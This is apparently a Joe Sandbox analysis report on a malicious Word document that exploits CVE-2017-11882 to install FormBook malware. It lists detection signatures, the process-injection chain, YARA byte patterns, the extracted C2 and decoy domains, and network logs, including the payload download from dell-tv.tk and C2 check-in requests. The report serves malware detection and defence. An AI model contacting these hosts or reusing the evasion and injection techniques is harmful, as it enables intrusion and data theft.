Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report P.O-5433ERE.doc

Overview

General Information

Sample Name:P.O-5433ERE.doc
Analysis ID:528734
MD5:17ca06000e92058f0d43259b2683537c
SHA1:db453e5125310d209fe04fb0211677d79d25f3ee
SHA256:3c9280552a4129fdf884414b080c80d5ffc72403079d7a5292e9b09d832ab37d
Tags:doc
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Sigma detected: EQNEDT32.EXE connecting to internet
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
Sigma detected: Droppers Exploiting CVE-2017-11882
System process connects to network (likely due to code injection or exploit)
Sigma detected: File Dropped By EQNEDT32EXE
Antivirus detection for dropped file
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Office equation editor drops PE file
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Sigma detected: CMSTP Execution Process Creation
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses a Windows Living Off The Land Binaries (LOL bins)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Document has an unknown application name
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Potential document exploit detected (performs DNS queries)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Downloads executable code via HTTP
Contains functionality for execution timing, often used to detect debuggers
Document misses a certain OLE stream usually present in this Microsoft Office document type
Contains long sleeps (>= 3 min)
Document contains Microsoft Equation 3.0 OLE entries
Enables debug privileges
Document contains no OLE stream with summary information
Found inlined nop instructions (likely shell or obfuscated code)
Potential document exploit detected (unknown TCP traffic)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Office Equation Editor has been started
Checks if the current process is being debugged
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w7x64
  • WINWORD.EXE (PID: 1516 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
  • EQNEDT32.EXE (PID: 2812 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • ashlkyvc7592.exe (PID: 1528 cmdline: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe MD5: D236BB1F86CAEC110ABB20FC2360E25B)
      • ashlkyvc7592.exe (PID: 836 cmdline: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe MD5: D236BB1F86CAEC110ABB20FC2360E25B)
        • explorer.exe (PID: 1764 cmdline: C:\Windows\Explorer.EXE MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
          • cmstp.exe (PID: 2580 cmdline: C:\Windows\SysWOW64\cmstp.exe MD5: 00263CA2071DC9A6EE577EB356B0D1D9)
            • cmd.exe (PID: 2176 cmdline: /c del "C:\Users\user\AppData\Roaming\ashlkyvc7592.exe" MD5: AD7B9C14083B52BC532FBA5948342B98)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.fcusd4.com/op9t/"], "decoy": ["tzjwt261888.com", "top10iecasinos.com", "nurotag.com", "controlparental24.com", "truenettnpasumo1.xyz", "finsits.com", "publicfigure.skin", "natalispharma.com", "brixbol.com", "bal.group", "perfectinteractivemedia.com", "fascialboost.com", "jgcpfb120.com", "grizzlysolutionsllc.net", "wearegardenersusa.com", "rjsarka.com", "shintoku-gsfarm.com", "1oavyx.com", "volunteervabetweenk.com", "tdshawn.com", "bandhancustomer.com", "amyzingskin.com", "sorbetsa.com", "eadbrasil.club", "directnaukri.com", "alltheheads.com", "elbbinandnibble.online", "kaizenswinger.com", "kimberleydawnwallace.com", "zscyyds.xyz", "ecranthermique.com", "mystitched.com", "shophallows.com", "cachondearais.xyz", "flavatdvb.quest", "christendombiblecollege.com", "affordalbehousing.com", "engro-connect.com", "lorticepttoyof2.xyz", "kingslot.bet", "wiseriq.com", "emmaraducanu.tennis", "xn--seebhnegrlitz-pmb9f.com", "perfectstudio.net", "thenewera.icu", "com104940689794.icu", "imaginative-coaching.com", "campdiscount.info", "waggledance.net", "excellglobus.com", "fssqyd.com", "yalesi.net", "aoliutech.com", "replenish.place", "nityammed.com", "stanislauscountyedu.info", "029saxjy.com", "lttcp089.com", "texaszephyr.com", "sloanlakecomedy.com", "axonlang.com", "bhutaan.com", "sevensummitclimbing.com", "wolfenhawk.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000007.00000002.686456820.0000000000320000.00000004.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000007.00000002.686456820.0000000000320000.00000004.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19b97:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1ac3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000007.00000002.686456820.0000000000320000.00000004.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x16ac9:$sqlite3step: 68 34 1C 7B E1
    • 0x16bdc:$sqlite3step: 68 34 1C 7B E1
    • 0x16af8:$sqlite3text: 68 38 2A 90 C5
    • 0x16c1d:$sqlite3text: 68 38 2A 90 C5
    • 0x16b0b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16c33:$sqlite3blob: 68 53 D8 7F 8C
    00000007.00000002.686315471.00000000001A0000.00000040.00020000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000007.00000002.686315471.00000000001A0000.00000040.00020000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19b97:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1ac3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 31 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      5.0.ashlkyvc7592.exe.400000.8.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        5.0.ashlkyvc7592.exe.400000.8.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x19b97:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1ac3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        5.0.ashlkyvc7592.exe.400000.8.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x16ac9:$sqlite3step: 68 34 1C 7B E1
        • 0x16bdc:$sqlite3step: 68 34 1C 7B E1
        • 0x16af8:$sqlite3text: 68 38 2A 90 C5
        • 0x16c1d:$sqlite3text: 68 38 2A 90 C5
        • 0x16b0b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x16c33:$sqlite3blob: 68 53 D8 7F 8C
        5.0.ashlkyvc7592.exe.400000.10.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          5.0.ashlkyvc7592.exe.400000.10.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x7808:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x7b92:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x138a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x13391:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x139a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x13b1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x85aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1260c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0x9322:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x18d97:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x19e3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 22 entries

          Sigma Overview

          Exploits:

          barindex
          Sigma detected: EQNEDT32.EXE connecting to internetShow sources
          Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 37.0.9.166, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2812, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49165
          Sigma detected: File Dropped By EQNEDT32EXEShow sources
          Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2812, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\ashlyzx[1].exe

          System Summary:

          barindex
          Sigma detected: Droppers Exploiting CVE-2017-11882Show sources
          Source: Process startedAuthor: Florian Roth: Data: Command: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe, CommandLine: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe, NewProcessName: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe, OriginalFileName: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2812, ProcessCommandLine: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe, ProcessId: 1528
          Sigma detected: CMSTP Execution Process CreationShow sources
          Source: Process startedAuthor: Nik Seetharaman: Data: Command: /c del "C:\Users\user\AppData\Roaming\ashlkyvc7592.exe", CommandLine: /c del "C:\Users\user\AppData\Roaming\ashlkyvc7592.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: C:\Windows\SysWOW64\cmstp.exe, ParentImage: C:\Windows\SysWOW64\cmstp.exe, ParentProcessId: 2580, ProcessCommandLine: /c del "C:\Users\user\AppData\Roaming\ashlkyvc7592.exe", ProcessId: 2176

          Jbx Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 00000007.00000002.686456820.0000000000320000.00000004.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.fcusd4.com/op9t/"], "decoy": ["tzjwt261888.com", "top10iecasinos.com", "nurotag.com", "controlparental24.com", "truenettnpasumo1.xyz", "finsits.com", "publicfigure.skin", "natalispharma.com", "brixbol.com", "bal.group", "perfectinteractivemedia.com", "fascialboost.com", "jgcpfb120.com", "grizzlysolutionsllc.net", "wearegardenersusa.com", "rjsarka.com", "shintoku-gsfarm.com", "1oavyx.com", "volunteervabetweenk.com", "tdshawn.com", "bandhancustomer.com", "amyzingskin.com", "sorbetsa.com", "eadbrasil.club", "directnaukri.com", "alltheheads.com", "elbbinandnibble.online", "kaizenswinger.com", "kimberleydawnwallace.com", "zscyyds.xyz", "ecranthermique.com", "mystitched.com", "shophallows.com", "cachondearais.xyz", "flavatdvb.quest", "christendombiblecollege.com", "affordalbehousing.com", "engro-connect.com", "lorticepttoyof2.xyz", "kingslot.bet", "wiseriq.com", "emmaraducanu.tennis", "xn--seebhnegrlitz-pmb9f.com", "perfectstudio.net", "thenewera.icu", "com104940689794.icu", "imaginative-coaching.com", "campdiscount.info", "waggledance.net", "excellglobus.com", "fssqyd.com", "yalesi.net", "aoliutech.com", "replenish.place", "nityammed.com", "stanislauscountyedu.info", "029saxjy.com", "lttcp089.com", "texaszephyr.com", "sloanlakecomedy.com", "axonlang.com", "bhutaan.com", "sevensummitclimbing.com", "wolfenhawk.com"]}
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 5.0.ashlkyvc7592.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.ashlkyvc7592.exe.400000.10.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.ashlkyvc7592.exe.33ebb40.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.ashlkyvc7592.exe.3393520.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.ashlkyvc7592.exe.400000.10.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.ashlkyvc7592.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.ashlkyvc7592.exe.400000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.ashlkyvc7592.exe.400000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.ashlkyvc7592.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000007.00000002.686456820.0000000000320000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.686315471.00000000001A0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.453524985.0000000009369000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.423949680.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.686259720.0000000000090000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.461715282.0000000000360000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.461785440.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.423661966.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.446630168.0000000009369000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.461694176.0000000000310000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.425827877.0000000003249000.00000004.00000001.sdmp, type: MEMORY
          Antivirus detection for dropped fileShow sources
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{3D999299-2169-4632-82B1-6FEE86AD4ADA}.tmpAvira: detection malicious, Label: EXP/CVE-2017-11882.Gen
          Source: 5.0.ashlkyvc7592.exe.400000.10.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 5.0.ashlkyvc7592.exe.400000.8.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 5.2.ashlkyvc7592.exe.400000.2.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 5.0.ashlkyvc7592.exe.400000.6.unpackAvira: Label: TR/Crypt.ZPACK.Gen

          Exploits:

          barindex
          Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)Show sources
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeJump to behavior
          Source: ~WRF{3D999299-2169-4632-82B1-6FEE86AD4ADA}.tmp.0.drStream path '_1699368849/\x1CompObj' : ...........................F....Microsoft Equation
          Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
          Source: Binary string: wntdll.pdb source: ashlkyvc7592.exe, ashlkyvc7592.exe, 00000005.00000003.424164499.00000000007B0000.00000004.00000001.sdmp, ashlkyvc7592.exe, 00000005.00000003.425110861.0000000000910000.00000004.00000001.sdmp, ashlkyvc7592.exe, 00000005.00000002.461925048.0000000000AA0000.00000040.00000001.sdmp, ashlkyvc7592.exe, 00000005.00000002.462140612.0000000000C20000.00000040.00000001.sdmp, cmstp.exe, cmstp.exe, 00000007.00000002.686656983.0000000002000000.00000040.00000001.sdmp, cmstp.exe, 00000007.00000003.462746039.0000000001E70000.00000004.00000001.sdmp, cmstp.exe, 00000007.00000003.461709967.00000000004F0000.00000004.00000001.sdmp, cmstp.exe, 00000007.00000002.686830161.0000000002180000.00000040.00000001.sdmp
          Source: Binary string: cmstp.pdb source: ashlkyvc7592.exe, 00000005.00000002.461894500.00000000006D9000.00000004.00000020.sdmp, ashlkyvc7592.exe, 00000005.00000002.461761536.00000000003E0000.00000040.00020000.sdmp
          Source: global trafficDNS query: name: dell-tv.tk
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 4x nop then pop edi5_2_0041566A
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeCode function: 4x nop then pop esi5_2_004157F9
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4x nop then pop edi7_2_000A566A
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4x nop then pop esi7_2_000A57F9
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 37.0.9.166:80
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 37.0.9.166:80

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49166 -> 144.91.75.9:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49166 -> 144.91.75.9:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49166 -> 144.91.75.9:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49167 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49167 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49167 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49168 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49168 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49168 -> 34.102.136.180:80
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeDomain query: www.texaszephyr.com
          Source: C:\Windows\explorer.exeDomain query: www.bandhancustomer.com
          Source: C:\Windows\explorer.exeDomain query: www.publicfigure.skin
          Source: C:\Windows\explorer.exeNetwork Connect: 172.67.184.102 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.volunteervabetweenk.com
          Source: C:\Windows\explorer.exeDomain query: www.1oavyx.com
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80Jump to behavior
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.fcusd4.com/op9t/
          Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
          Source: Joe Sandbox ViewASN Name: WKD-ASIE WKD-ASIE
          Source: global trafficHTTP traffic detected: GET /op9t/?0l=exlpTNNXh0F&c0=4uZm8lPh56XAYP0u1p0c6SVxcutgTZuNbzhe7MVeNR3LwnMhhkFBXHHvU8jy6jgZH7Gcyg== HTTP/1.1Host: www.texaszephyr.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /op9t/?c0=RQ8pabDbnEWS4MHppDnLpAnnVm0R7EKmWqTB7JHuP07woLOWNs0JhuHKNBpScYVLrEmjjw==&0l=exlpTNNXh0F HTTP/1.1Host: www.publicfigure.skinConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /op9t/?0l=exlpTNNXh0F&c0=WMWbw9/24XbwIiPl+aU7TY/mYt55hlmFa8WJlEktQGdJQVklk58s/CKKr8Th7+7tz7UKpw== HTTP/1.1Host: www.volunteervabetweenk.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 37.0.9.166 37.0.9.166
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 25 Nov 2021 17:08:39 GMTContent-Type: application/x-msdownloadContent-Length: 560128Last-Modified: Thu, 25 Nov 2021 01:30:41 GMTConnection: keep-aliveETag: "619ee741-88c00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 b4 e5 9e 61 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 80 08 00 00 0a 00 00 00 00 00 00 16 9f 08 00 00 20 00 00 00 a0 08 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 e0 08 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 c4 9e 08 00 4f 00 00 00 00 a0 08 00 70 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 08 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 74 7f 08 00 00 20 00 00 00 80 08 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 70 06 00 00 00 a0 08 00 00 08 00 00 00 82 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 c0 08 00 00 02 00 00 00 8a 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 9e 08 00 00 00 00 00 48 00 00 00 02 00 05 00 ac 48 01 00 b8 21 01 00 03 00 00 00 8c 01 00 06 64 6a 02 00 60 34 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 be 02 73 1f 00 00 0a 7d 01 00 00 04 02 73 20 00 00 0a 7d 06 00 00 04 02 28 21 00 00 0a 02 28 14 00 00 06 02 7b 0d 00 00 04 17 6f 22 00 00 0a 2a 1b 30 03 00 ac 00 00 00 01 00 00 11 02 28 03 00 00 06 02 03 7d 03 00 00 04 03 2d 09 02 14 7d 02 00 00 04 2b 54 02 7b 01 00 00 04 03 6f 23 00 00 0a 6f 24 00 00 0a 2c 19 02 02 7b 01 00 00 04 03 6f 23 00 00 0a 6f 25 00 00 0a 7d 02 00 00 04 2b 28 02 73 26 00 00 0a 7d 02 00 00 04 02 7b 01 00 00 04 03 6f 23 00 00 0a 02 7b 02 00 00 04 6f 27 00 00 0a 02 28 07 00 00 06 02 7b 02 00 00 04 2c 36 02 7b 02 00 00 04 6f 28 00 00 0a 0a 2b 0f 12 00 28 29 00 00 0a 0b 02 07 28 10 00 00 06 12 00 28 2a 00 00 0a 2d e8 de 0e 12 00 fe 16 11 00 00 1b 6f 12 00 00 0a dc 2a 01 10 00 00 02 00 81 00 1c 9d 00 0e 00 00 00 00 8e 02 7b 06 00 00 04 6f 2b 00 00 0a 02 7b 09 00 00 04 6f 2c 00 00 0a 6f 2d 00 00 0a 02 14 7d 03 00 00 04 2a 13 30 03 00 29 00 00 00 02 00 00 11 02 7b 07 00 00 04 0a 06 0b 07 03 28 2e 00 00 0a 74 04 00 00 02 0c 02 7c 07 00
          Source: global trafficHTTP traffic detected: GET /ashlyzx.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: dell-tv.tkConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Thu, 25 Nov 2021 17:10:32 GMTContent-Type: text/htmlContent-Length: 275ETag: "618be75c-113"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 